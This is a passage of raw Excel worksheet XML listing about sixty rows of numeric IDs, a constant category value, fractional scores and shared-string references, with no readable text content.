      <c r="C7781">
        <v>3010</v>
      </c>
      <c r="D7781">
        <v>4</v>
      </c>
      <c r="E7781">
        <v>0.62379997968673706</v>
      </c>
      <c r="F7781" t="s">
        <v>13461</v>
      </c>
      <c r="G7781" t="s">
        <v>15390</v>
      </c>
      <c r="H7781" t="s">
        <v>15391</v>
      </c>
    </row>
    <row r="7782" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7782" s="1">
        <v>7780</v>
      </c>
      <c r="B7782">
        <v>3022</v>
      </c>
      <c r="C7782">
        <v>3022</v>
      </c>
      <c r="D7782">
        <v>4</v>
      </c>
      <c r="E7782">
        <v>0.65109997987747192</v>
      </c>
      <c r="F7782" t="s">
        <v>13461</v>
      </c>
      <c r="G7782" t="s">
        <v>15392</v>
      </c>
      <c r="H7782" t="s">
        <v>15393</v>
      </c>
    </row>
    <row r="7783" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7783" s="1">
        <v>7781</v>
      </c>
      <c r="B7783">
        <v>3043</v>
      </c>
      <c r="C7783">
        <v>3043</v>
      </c>
      <c r="D7783">
        <v>4</v>
      </c>
      <c r="E7783">
        <v>0.98949998617172241</v>
      </c>
      <c r="F7783" t="s">
        <v>13461</v>
      </c>
      <c r="G7783" t="s">
        <v>15394</v>
      </c>
      <c r="H7783" t="s">
        <v>15395</v>
      </c>
    </row>
    <row r="7784" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7784" s="1">
        <v>7782</v>
      </c>
      <c r="B7784">
        <v>3063</v>
      </c>
      <c r="C7784">
        <v>3063</v>
      </c>
      <c r="D7784">
        <v>4</v>
      </c>
      <c r="E7784">
        <v>0.36489999294281011</v>
      </c>
      <c r="F7784" t="s">
        <v>13461</v>
      </c>
      <c r="G7784" t="s">
        <v>15396</v>
      </c>
      <c r="H7784" t="s">
        <v>15397</v>
      </c>
    </row>
    <row r="7785" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7785" s="1">
        <v>7783</v>
      </c>
      <c r="B7785">
        <v>3064</v>
      </c>
      <c r="C7785">
        <v>3064</v>
      </c>
      <c r="D7785">
        <v>4</v>
      </c>
      <c r="E7785">
        <v>0.48089998960495001</v>
      </c>
      <c r="F7785" t="s">
        <v>13461</v>
      </c>
      <c r="G7785" t="s">
        <v>15398</v>
      </c>
      <c r="H7785" t="s">
        <v>14492</v>
      </c>
    </row>
    <row r="7786" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7786" s="1">
        <v>7784</v>
      </c>
      <c r="B7786">
        <v>6562</v>
      </c>
      <c r="C7786">
        <v>6562</v>
      </c>
      <c r="D7786">
        <v>4</v>
      </c>
      <c r="E7786">
        <v>0.99690002202987671</v>
      </c>
      <c r="F7786" t="s">
        <v>13461</v>
      </c>
      <c r="G7786" t="s">
        <v>15399</v>
      </c>
      <c r="H7786" t="s">
        <v>15400</v>
      </c>
    </row>
    <row r="7787" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7787" s="1">
        <v>7785</v>
      </c>
      <c r="B7787">
        <v>2996</v>
      </c>
      <c r="C7787">
        <v>2996</v>
      </c>
      <c r="D7787">
        <v>4</v>
      </c>
      <c r="E7787">
        <v>0.91839998960494995</v>
      </c>
      <c r="F7787" t="s">
        <v>13461</v>
      </c>
      <c r="G7787" t="s">
        <v>15401</v>
      </c>
      <c r="H7787" t="s">
        <v>15402</v>
      </c>
    </row>
    <row r="7788" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7788" s="1">
        <v>7786</v>
      </c>
      <c r="B7788">
        <v>6606</v>
      </c>
      <c r="C7788">
        <v>6606</v>
      </c>
      <c r="D7788">
        <v>4</v>
      </c>
      <c r="E7788">
        <v>0.99809998273849487</v>
      </c>
      <c r="F7788" t="s">
        <v>13461</v>
      </c>
      <c r="G7788" t="s">
        <v>15403</v>
      </c>
      <c r="H7788" t="s">
        <v>15404</v>
      </c>
    </row>
    <row r="7789" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7789" s="1">
        <v>7787</v>
      </c>
      <c r="B7789">
        <v>6514</v>
      </c>
      <c r="C7789">
        <v>6514</v>
      </c>
      <c r="D7789">
        <v>4</v>
      </c>
      <c r="E7789">
        <v>0.991100013256073</v>
      </c>
      <c r="F7789" t="s">
        <v>13461</v>
      </c>
      <c r="G7789" t="s">
        <v>15405</v>
      </c>
      <c r="H7789" t="s">
        <v>15406</v>
      </c>
    </row>
    <row r="7790" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7790" s="1">
        <v>7788</v>
      </c>
      <c r="B7790">
        <v>3207</v>
      </c>
      <c r="C7790">
        <v>3207</v>
      </c>
      <c r="D7790">
        <v>4</v>
      </c>
      <c r="E7790">
        <v>0.62360000610351563</v>
      </c>
      <c r="F7790" t="s">
        <v>13461</v>
      </c>
      <c r="G7790" t="s">
        <v>15407</v>
      </c>
      <c r="H7790" t="s">
        <v>15408</v>
      </c>
    </row>
    <row r="7791" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7791" s="1">
        <v>7789</v>
      </c>
      <c r="B7791">
        <v>6461</v>
      </c>
      <c r="C7791">
        <v>6461</v>
      </c>
      <c r="D7791">
        <v>4</v>
      </c>
      <c r="E7791">
        <v>0.99980002641677856</v>
      </c>
      <c r="F7791" t="s">
        <v>13461</v>
      </c>
      <c r="G7791" t="s">
        <v>15409</v>
      </c>
      <c r="H7791" t="s">
        <v>15410</v>
      </c>
    </row>
    <row r="7792" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7792" s="1">
        <v>7790</v>
      </c>
      <c r="B7792">
        <v>6460</v>
      </c>
      <c r="C7792">
        <v>6460</v>
      </c>
      <c r="D7792">
        <v>4</v>
      </c>
      <c r="E7792">
        <v>0.51109999418258667</v>
      </c>
      <c r="F7792" t="s">
        <v>13461</v>
      </c>
      <c r="G7792" t="s">
        <v>15411</v>
      </c>
      <c r="H7792" t="s">
        <v>15412</v>
      </c>
    </row>
    <row r="7793" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7793" s="1">
        <v>7791</v>
      </c>
      <c r="B7793">
        <v>3360</v>
      </c>
      <c r="C7793">
        <v>3360</v>
      </c>
      <c r="D7793">
        <v>4</v>
      </c>
      <c r="E7793">
        <v>0.8310999870300293</v>
      </c>
      <c r="F7793" t="s">
        <v>13461</v>
      </c>
      <c r="G7793" t="s">
        <v>15413</v>
      </c>
      <c r="H7793" t="s">
        <v>15414</v>
      </c>
    </row>
    <row r="7794" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7794" s="1">
        <v>7792</v>
      </c>
      <c r="B7794">
        <v>6455</v>
      </c>
      <c r="C7794">
        <v>6455</v>
      </c>
      <c r="D7794">
        <v>4</v>
      </c>
      <c r="E7794">
        <v>0.41929998993873602</v>
      </c>
      <c r="F7794" t="s">
        <v>13461</v>
      </c>
      <c r="G7794" t="s">
        <v>15415</v>
      </c>
      <c r="H7794" t="s">
        <v>15416</v>
      </c>
    </row>
    <row r="7795" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7795" s="1">
        <v>7793</v>
      </c>
      <c r="B7795">
        <v>6454</v>
      </c>
      <c r="C7795">
        <v>6454</v>
      </c>
      <c r="D7795">
        <v>4</v>
      </c>
      <c r="E7795">
        <v>0.99800002574920654</v>
      </c>
      <c r="F7795" t="s">
        <v>13461</v>
      </c>
      <c r="G7795" t="s">
        <v>15417</v>
      </c>
      <c r="H7795" t="s">
        <v>15418</v>
      </c>
    </row>
    <row r="7796" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7796" s="1">
        <v>7794</v>
      </c>
      <c r="B7796">
        <v>6451</v>
      </c>
      <c r="C7796">
        <v>6451</v>
      </c>
      <c r="D7796">
        <v>4</v>
      </c>
      <c r="E7796">
        <v>0.99830001592636108</v>
      </c>
      <c r="F7796" t="s">
        <v>13461</v>
      </c>
      <c r="G7796" t="s">
        <v>15419</v>
      </c>
      <c r="H7796" t="s">
        <v>15420</v>
      </c>
    </row>
    <row r="7797" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7797" s="1">
        <v>7795</v>
      </c>
      <c r="B7797">
        <v>3380</v>
      </c>
      <c r="C7797">
        <v>3380</v>
      </c>
      <c r="D7797">
        <v>4</v>
      </c>
      <c r="E7797">
        <v>0.85890001058578491</v>
      </c>
      <c r="F7797" t="s">
        <v>13461</v>
      </c>
      <c r="G7797" t="s">
        <v>15421</v>
      </c>
      <c r="H7797" t="s">
        <v>15422</v>
      </c>
    </row>
    <row r="7798" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7798" s="1">
        <v>7796</v>
      </c>
      <c r="B7798">
        <v>3384</v>
      </c>
      <c r="C7798">
        <v>3384</v>
      </c>
      <c r="D7798">
        <v>4</v>
      </c>
      <c r="E7798">
        <v>0.93519997596740723</v>
      </c>
      <c r="F7798" t="s">
        <v>13461</v>
      </c>
      <c r="G7798" t="s">
        <v>15423</v>
      </c>
      <c r="H7798" t="s">
        <v>15424</v>
      </c>
    </row>
    <row r="7799" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7799" s="1">
        <v>7797</v>
      </c>
      <c r="B7799">
        <v>6445</v>
      </c>
      <c r="C7799">
        <v>6445</v>
      </c>
      <c r="D7799">
        <v>4</v>
      </c>
      <c r="E7799">
        <v>0.99839997291564941</v>
      </c>
      <c r="F7799" t="s">
        <v>13461</v>
      </c>
      <c r="G7799" t="s">
        <v>15425</v>
      </c>
      <c r="H7799" t="s">
        <v>15426</v>
      </c>
    </row>
    <row r="7800" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7800" s="1">
        <v>7798</v>
      </c>
      <c r="B7800">
        <v>6462</v>
      </c>
      <c r="C7800">
        <v>6462</v>
      </c>
      <c r="D7800">
        <v>4</v>
      </c>
      <c r="E7800">
        <v>0.99819999933242798</v>
      </c>
      <c r="F7800" t="s">
        <v>13461</v>
      </c>
      <c r="G7800" t="s">
        <v>15427</v>
      </c>
      <c r="H7800" t="s">
        <v>15428</v>
      </c>
    </row>
    <row r="7801" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7801" s="1">
        <v>7799</v>
      </c>
      <c r="B7801">
        <v>3385</v>
      </c>
      <c r="C7801">
        <v>3385</v>
      </c>
      <c r="D7801">
        <v>4</v>
      </c>
      <c r="E7801">
        <v>0.58639997243881226</v>
      </c>
      <c r="F7801" t="s">
        <v>13461</v>
      </c>
      <c r="G7801" t="s">
        <v>15429</v>
      </c>
      <c r="H7801" t="s">
        <v>15430</v>
      </c>
    </row>
    <row r="7802" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7802" s="1">
        <v>7800</v>
      </c>
      <c r="B7802">
        <v>3408</v>
      </c>
      <c r="C7802">
        <v>3408</v>
      </c>
      <c r="D7802">
        <v>4</v>
      </c>
      <c r="E7802">
        <v>0.39129999279975891</v>
      </c>
      <c r="F7802" t="s">
        <v>13461</v>
      </c>
      <c r="G7802" t="s">
        <v>15431</v>
      </c>
      <c r="H7802" t="s">
        <v>15432</v>
      </c>
    </row>
    <row r="7803" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7803" s="1">
        <v>7801</v>
      </c>
      <c r="B7803">
        <v>3412</v>
      </c>
      <c r="C7803">
        <v>3412</v>
      </c>
      <c r="D7803">
        <v>4</v>
      </c>
      <c r="E7803">
        <v>0.92519998550415039</v>
      </c>
      <c r="F7803" t="s">
        <v>13461</v>
      </c>
      <c r="G7803" t="s">
        <v>15433</v>
      </c>
      <c r="H7803" t="s">
        <v>15434</v>
      </c>
    </row>
    <row r="7804" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7804" s="1">
        <v>7802</v>
      </c>
      <c r="B7804">
        <v>3413</v>
      </c>
      <c r="C7804">
        <v>3413</v>
      </c>
      <c r="D7804">
        <v>4</v>
      </c>
      <c r="E7804">
        <v>0.99989998340606689</v>
      </c>
      <c r="F7804" t="s">
        <v>13461</v>
      </c>
      <c r="G7804" t="s">
        <v>15435</v>
      </c>
      <c r="H7804" t="s">
        <v>15436</v>
      </c>
    </row>
    <row r="7805" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7805" s="1">
        <v>7803</v>
      </c>
      <c r="B7805">
        <v>3421</v>
      </c>
      <c r="C7805">
        <v>3421</v>
      </c>
      <c r="D7805">
        <v>4</v>
      </c>
      <c r="E7805">
        <v>0.68879997730255127</v>
      </c>
      <c r="F7805" t="s">
        <v>13461</v>
      </c>
      <c r="G7805" t="s">
        <v>15437</v>
      </c>
      <c r="H7805" t="s">
        <v>15438</v>
      </c>
    </row>
    <row r="7806" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7806" s="1">
        <v>7804</v>
      </c>
      <c r="B7806">
        <v>6436</v>
      </c>
      <c r="C7806">
        <v>6436</v>
      </c>
      <c r="D7806">
        <v>4</v>
      </c>
      <c r="E7806">
        <v>0.99129998683929443</v>
      </c>
      <c r="F7806" t="s">
        <v>13461</v>
      </c>
      <c r="G7806" t="s">
        <v>15439</v>
      </c>
      <c r="H7806" t="s">
        <v>15440</v>
      </c>
    </row>
    <row r="7807" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7807" s="1">
        <v>7805</v>
      </c>
      <c r="B7807">
        <v>3422</v>
      </c>
      <c r="C7807">
        <v>3422</v>
      </c>
      <c r="D7807">
        <v>4</v>
      </c>
      <c r="E7807">
        <v>0.44679999351501459</v>
      </c>
      <c r="F7807" t="s">
        <v>13461</v>
      </c>
      <c r="G7807" t="s">
        <v>15441</v>
      </c>
      <c r="H7807" t="s">
        <v>15442</v>
      </c>
    </row>
    <row r="7808" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7808" s="1">
        <v>7806</v>
      </c>
      <c r="B7808">
        <v>3431</v>
      </c>
      <c r="C7808">
        <v>3431</v>
      </c>
      <c r="D7808">
        <v>4</v>
      </c>
      <c r="E7808">
        <v>0.79449999332427979</v>
      </c>
      <c r="F7808" t="s">
        <v>13461</v>
      </c>
      <c r="G7808" t="s">
        <v>15443</v>
      </c>
      <c r="H7808" t="s">
        <v>15444</v>
      </c>
    </row>
    <row r="7809" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7809" s="1">
        <v>7807</v>
      </c>
      <c r="B7809">
        <v>3455</v>
      </c>
      <c r="C7809">
        <v>3455</v>
      </c>
      <c r="D7809">
        <v>4</v>
      </c>
      <c r="E7809">
        <v>0.3822999894618988</v>
      </c>
      <c r="F7809" t="s">
        <v>13461</v>
      </c>
      <c r="G7809" t="s">
        <v>15445</v>
      </c>
      <c r="H7809" t="s">
        <v>15446</v>
      </c>
    </row>
    <row r="7810" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7810" s="1">
        <v>7808</v>
      </c>
      <c r="B7810">
        <v>3474</v>
      </c>
      <c r="C7810">
        <v>3474</v>
      </c>
      <c r="D7810">
        <v>4</v>
      </c>
      <c r="E7810">
        <v>0.53100001811981201</v>
      </c>
      <c r="F7810" t="s">
        <v>13461</v>
      </c>
      <c r="G7810" t="s">
        <v>15447</v>
      </c>
      <c r="H7810" t="s">
        <v>15448</v>
      </c>
    </row>
    <row r="7811" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7811" s="1">
        <v>7809</v>
      </c>
      <c r="B7811">
        <v>3387</v>
      </c>
      <c r="C7811">
        <v>3387</v>
      </c>
      <c r="D7811">
        <v>4</v>
      </c>
      <c r="E7811">
        <v>0.38269999623298651</v>
      </c>
      <c r="F7811" t="s">
        <v>13461</v>
      </c>
      <c r="G7811" t="s">
        <v>15449</v>
      </c>
      <c r="H7811" t="s">
        <v>15450</v>
      </c>
    </row>
    <row r="7812" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7812" s="1">
        <v>7810</v>
      </c>
      <c r="B7812">
        <v>3205</v>
      </c>
      <c r="C7812">
        <v>3205</v>
      </c>
      <c r="D7812">
        <v>4</v>
      </c>
      <c r="E7812">
        <v>0.51679998636245728</v>
      </c>
      <c r="F7812" t="s">
        <v>13461</v>
      </c>
      <c r="G7812" t="s">
        <v>15451</v>
      </c>
      <c r="H7812" t="s">
        <v>15452</v>
      </c>
    </row>
    <row r="7813" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7813" s="1">
        <v>7811</v>
      </c>
      <c r="B7813">
        <v>6463</v>
      </c>
      <c r="C7813">
        <v>6463</v>
      </c>
      <c r="D7813">
        <v>4</v>
      </c>
      <c r="E7813">
        <v>0.58340001106262207</v>
      </c>
      <c r="F7813" t="s">
        <v>13461</v>
      </c>
      <c r="G7813" t="s">
        <v>15453</v>
      </c>
      <c r="H7813" t="s">
        <v>15454</v>
      </c>
    </row>
    <row r="7814" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7814" s="1">
        <v>7812</v>
      </c>
      <c r="B7814">
        <v>6465</v>
      </c>
      <c r="C7814">
        <v>6465</v>
      </c>
      <c r="D7814">
        <v>4</v>
      </c>
      <c r="E7814">
        <v>0.6809999942779541</v>
      </c>
      <c r="F7814" t="s">
        <v>13461</v>
      </c>
      <c r="G7814" t="s">
        <v>15455</v>
      </c>
      <c r="H7814" t="s">
        <v>15456</v>
      </c>
    </row>
    <row r="7815" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7815" s="1">
        <v>7813</v>
      </c>
      <c r="B7815">
        <v>3213</v>
      </c>
      <c r="C7815">
        <v>3213</v>
      </c>
      <c r="D7815">
        <v>4</v>
      </c>
      <c r="E7815">
        <v>0.49039998650550842</v>
      </c>
      <c r="F7815" t="s">
        <v>13461</v>
      </c>
      <c r="G7815" t="s">
        <v>15457</v>
      </c>
      <c r="H7815" t="s">
        <v>15458</v>
      </c>
    </row>
    <row r="7816" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7816" s="1">
        <v>7814</v>
      </c>
      <c r="B7816">
        <v>6509</v>
      </c>
      <c r="C7816">
        <v>6509</v>
      </c>
      <c r="D7816">
        <v>4</v>
      </c>
      <c r="E7816">
        <v>0.8156999945640564</v>
      </c>
      <c r="F7816" t="s">
        <v>13461</v>
      </c>
      <c r="G7816" t="s">
        <v>15459</v>
      </c>
      <c r="H7816" t="s">
        <v>15460</v>
      </c>
    </row>
    <row r="7817" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7817" s="1">
        <v>7815</v>
      </c>
      <c r="B7817">
        <v>6506</v>
      </c>
      <c r="C7817">
        <v>6506</v>
      </c>
      <c r="D7817">
        <v>4</v>
      </c>
      <c r="E7817">
        <v>0.99559998512268066</v>
      </c>
      <c r="F7817" t="s">
        <v>13461</v>
      </c>
      <c r="G7817" t="s">
        <v>15461</v>
      </c>
      <c r="H7817" t="s">
        <v>15462</v>
      </c>
    </row>
    <row r="7818" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7818" s="1">
        <v>7816</v>
      </c>
      <c r="B7818">
        <v>3225</v>
      </c>
      <c r="C7818">
        <v>3225</v>
      </c>
      <c r="D7818">
        <v>4</v>
      </c>
      <c r="E7818">
        <v>0.96310001611709595</v>
      </c>
      <c r="F7818" t="s">
        <v>13461</v>
      </c>
      <c r="G7818" t="s">
        <v>15463</v>
      </c>
      <c r="H7818" t="s">
        <v>15464</v>
      </c>
    </row>
    <row r="7819" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7819" s="1">
        <v>7817</v>
      </c>
      <c r="B7819">
        <v>3228</v>
      </c>
      <c r="C7819">
        <v>3228</v>
      </c>
      <c r="D7819">
        <v>4</v>
      </c>
      <c r="E7819">
        <v>0.78020000457763672</v>
      </c>
      <c r="F7819" t="s">
        <v>13461</v>
      </c>
      <c r="G7819" t="s">
        <v>15465</v>
      </c>
      <c r="H7819" t="s">
        <v>15466</v>
      </c>
    </row>
    <row r="7820" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7820" s="1">
        <v>7818</v>
      </c>
      <c r="B7820">
        <v>3231</v>
      </c>
      <c r="C7820">
        <v>3231</v>
      </c>
      <c r="D7820">
        <v>4</v>
      </c>
      <c r="E7820">
        <v>0.66329997777938843</v>
      </c>
      <c r="F7820" t="s">
        <v>13461</v>
      </c>
      <c r="G7820" t="s">
        <v>15467</v>
      </c>
      <c r="H7820" t="s">
        <v>15468</v>
      </c>
    </row>
    <row r="7821" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7821" s="1">
        <v>7819</v>
      </c>
      <c r="B7821">
        <v>3233</v>
      </c>
      <c r="C7821">
        <v>3233</v>
      </c>
      <c r="D7821">
        <v>4</v>
      </c>
      <c r="E7821">
        <v>0.84769999980926514</v>
      </c>
      <c r="F7821" t="s">
        <v>13461</v>
      </c>
      <c r="G7821" t="s">
        <v>15469</v>
      </c>
      <c r="H7821" t="s">
        <v>15470</v>
      </c>
    </row>
    <row r="7822" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7822" s="1">
        <v>7820</v>
      </c>
      <c r="B7822">
        <v>3234</v>
      </c>
      <c r="C7822">
        <v>3234</v>
      </c>
      <c r="D7822">
        <v>4</v>
      </c>
      <c r="E7822">
        <v>0.73009997606277466</v>
      </c>
      <c r="F7822" t="s">
        <v>13461</v>
      </c>
      <c r="G7822" t="s">
        <v>15471</v>
      </c>
      <c r="H7822" t="s">
        <v>15472</v>
      </c>
    </row>
    <row r="7823" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7823" s="1">
        <v>7821</v>
      </c>
      <c r="B7823">
        <v>3257</v>
      </c>
      <c r="C7823">
        <v>3257</v>
      </c>
      <c r="D7823">
        <v>4</v>
      </c>
      <c r="E7823">
        <v>0.67140001058578491</v>
      </c>
      <c r="F7823" t="s">
        <v>13461</v>
      </c>
      <c r="G7823" t="s">
        <v>15473</v>
      </c>
      <c r="H7823" t="s">
        <v>15474</v>
      </c>
    </row>
    <row r="7824" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7824" s="1">
        <v>7822</v>
      </c>
      <c r="B7824">
        <v>6464</v>
      </c>
      <c r="C7824">
        <v>6464</v>
      </c>
      <c r="D7824">
        <v>4</v>
      </c>
      <c r="E7824">
        <v>0.99970000982284546</v>
      </c>
      <c r="F7824" t="s">
        <v>13461</v>
      </c>
      <c r="G7824" t="s">
        <v>15475</v>
      </c>
      <c r="H7824" t="s">
        <v>15476</v>
      </c>
    </row>
    <row r="7825" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7825" s="1">
        <v>7823</v>
      </c>
      <c r="B7825">
        <v>3279</v>
      </c>
      <c r="C7825">
        <v>3279</v>
      </c>
      <c r="D7825">
        <v>4</v>
      </c>
      <c r="E7825">
        <v>0.65420001745223999</v>
      </c>
      <c r="F7825" t="s">
        <v>13461</v>
      </c>
      <c r="G7825" t="s">
        <v>15477</v>
      </c>
      <c r="H7825" t="s">
        <v>15478</v>
      </c>
    </row>
    <row r="7826" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7826" s="1">
        <v>7824</v>
      </c>
      <c r="B7826">
        <v>6482</v>
      </c>
      <c r="C7826">
        <v>6482</v>
      </c>
      <c r="D7826">
        <v>4</v>
      </c>
      <c r="E7826">
        <v>0.69770002365112305</v>
      </c>
      <c r="F7826" t="s">
        <v>13461</v>
      </c>
      <c r="G7826" t="s">
        <v>15479</v>
      </c>
      <c r="H7826" t="s">
        <v>15480</v>
      </c>
    </row>
    <row r="7827" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7827" s="1">
        <v>7825</v>
      </c>
      <c r="B7827">
        <v>3296</v>
      </c>
      <c r="C7827">
        <v>3296</v>
      </c>
      <c r="D7827">
        <v>4</v>
      </c>
      <c r="E7827">
        <v>0.79089999198913574</v>
      </c>
      <c r="F7827" t="s">
        <v>13461</v>
      </c>
      <c r="G7827" t="s">
        <v>15481</v>
      </c>
      <c r="H7827" t="s">
        <v>15482</v>
      </c>
    </row>
    <row r="7828" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7828" s="1">
        <v>7826</v>
      </c>
      <c r="B7828">
        <v>6479</v>
      </c>
      <c r="C7828">
        <v>6479</v>
      </c>
      <c r="D7828">
        <v>4</v>
      </c>
      <c r="E7828">
        <v>0.92949998378753662</v>
      </c>
      <c r="F7828" t="s">
        <v>13461</v>
      </c>
      <c r="G7828" t="s">
        <v>15483</v>
      </c>
      <c r="H7828" t="s">
        <v>15484</v>
      </c>
    </row>
    <row r="7829" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7829" s="1">
        <v>7827</v>
      </c>
      <c r="B7829">
        <v>3299</v>
      </c>
      <c r="C7829">
        <v>3299</v>
      </c>
      <c r="D7829">
        <v>4</v>
      </c>
      <c r="E7829">
        <v>0.69789999723434448</v>
      </c>
      <c r="F7829" t="s">
        <v>13461</v>
      </c>
      <c r="G7829" t="s">
        <v>15485</v>
      </c>
      <c r="H7829" t="s">
        <v>14802</v>
      </c>
    </row>
    <row r="7830" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7830" s="1">
        <v>7828</v>
      </c>
      <c r="B7830">
        <v>3324</v>
      </c>
      <c r="C7830">
        <v>3324</v>
      </c>
      <c r="D7830">
        <v>4</v>
      </c>
      <c r="E7830">
        <v>0.56709998846054077</v>
      </c>
      <c r="F7830" t="s">
        <v>13461</v>
      </c>
      <c r="G7830" t="s">
        <v>15486</v>
      </c>
      <c r="H7830" t="s">
        <v>15487</v>
      </c>
    </row>
    <row r="7831" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7831" s="1">
        <v>7829</v>
      </c>
      <c r="B7831">
        <v>3331</v>
      </c>
      <c r="C7831">
        <v>3331</v>
      </c>
      <c r="D7831">
        <v>4</v>
      </c>
      <c r="E7831">
        <v>0.55089998245239258</v>
      </c>
      <c r="F7831" t="s">
        <v>13461</v>
      </c>
      <c r="G7831" t="s">
        <v>15488</v>
      </c>
      <c r="H7831" t="s">
        <v>15489</v>
      </c>
    </row>
    <row r="7832" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7832" s="1">
        <v>7830</v>
      </c>
      <c r="B7832">
        <v>3332</v>
      </c>
      <c r="C7832">
        <v>3332</v>
      </c>
      <c r="D7832">
        <v>4</v>
      </c>
      <c r="E7832">
        <v>0.57410001754760742</v>
      </c>
      <c r="F7832" t="s">
        <v>13461</v>
      </c>
      <c r="G7832" t="s">
        <v>15490</v>
      </c>
      <c r="H7832" t="s">
        <v>15491</v>
      </c>
    </row>
    <row r="7833" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7833" s="1">
        <v>7831</v>
      </c>
      <c r="B7833">
        <v>3334</v>
      </c>
      <c r="C7833">
        <v>3334</v>
      </c>
      <c r="D7833">
        <v>4</v>
      </c>
      <c r="E7833">
        <v>0.83619999885559082</v>
      </c>
      <c r="F7833" t="s">
        <v>13461</v>
      </c>
      <c r="G7833" t="s">
        <v>15492</v>
      </c>
      <c r="H7833" t="s">
        <v>15493</v>
      </c>
    </row>
    <row r="7834" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7834" s="1">
        <v>7832</v>
      </c>
      <c r="B7834">
        <v>3335</v>
      </c>
      <c r="C7834">
        <v>3335</v>
      </c>
      <c r="D7834">
        <v>4</v>
      </c>
      <c r="E7834">
        <v>0.70920002460479736</v>
      </c>
      <c r="F7834" t="s">
        <v>13461</v>
      </c>
      <c r="G7834" t="s">
        <v>15494</v>
      </c>
      <c r="H7834" t="s">
        <v>15495</v>
      </c>
    </row>
    <row r="7835" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7835" s="1">
        <v>7833</v>
      </c>
      <c r="B7835">
        <v>3281</v>
      </c>
      <c r="C7835">
        <v>3281</v>
      </c>
      <c r="D7835">
        <v>4</v>
      </c>
      <c r="E7835">
        <v>0.41029998660087591</v>
      </c>
      <c r="F7835" t="s">
        <v>13461</v>
      </c>
      <c r="G7835" t="s">
        <v>15496</v>
      </c>
      <c r="H7835" t="s">
        <v>15497</v>
      </c>
    </row>
    <row r="7836" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7836" s="1">
        <v>7834</v>
      </c>
      <c r="B7836">
        <v>6608</v>
      </c>
      <c r="C7836">
        <v>6608</v>
      </c>
      <c r="D7836">
        <v>4</v>
      </c>
      <c r="E7836">
        <v>0.90799999237060547</v>
      </c>
      <c r="F7836" t="s">
        <v>13461</v>
      </c>
      <c r="G7836" t="s">
        <v>15498</v>
      </c>
      <c r="H7836" t="s">
        <v>15499</v>
      </c>
    </row>
    <row r="7837" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7837" s="1">
        <v>7835</v>
      </c>
      <c r="B7837">
        <v>6609</v>
      </c>
      <c r="C7837">
        <v>6609</v>
      </c>
      <c r="D7837">
        <v>4</v>
      </c>
      <c r="E7837">
        <v>0.86220002174377441</v>
      </c>
      <c r="F7837" t="s">
        <v>13461</v>
      </c>
      <c r="G7837" t="s">
        <v>15500</v>
      </c>
      <c r="H7837" t="s">
        <v>15501</v>
      </c>
    </row>
    <row r="7838" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7838" s="1">
        <v>7836</v>
      </c>
      <c r="B7838">
        <v>6610</v>
      </c>
      <c r="C7838">
        <v>6610</v>
      </c>
      <c r="D7838">
        <v>4</v>
      </c>
      <c r="E7838">
        <v>0.85949999094009399</v>
      </c>
      <c r="F7838" t="s">
        <v>13461</v>
      </c>
      <c r="G7838" t="s">
        <v>15502</v>
      </c>
      <c r="H7838" t="s">
        <v>15503</v>
      </c>
    </row>
    <row r="7839" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7839" s="1">
        <v>7837</v>
      </c>
      <c r="B7839">
        <v>2657</v>
      </c>
      <c r="C7839">
        <v>2657</v>
      </c>
      <c r="D7839">
        <v>4</v>
      </c>
      <c r="E7839">
        <v>0.5658000111579895</v>
      </c>
      <c r="F7839" t="s">
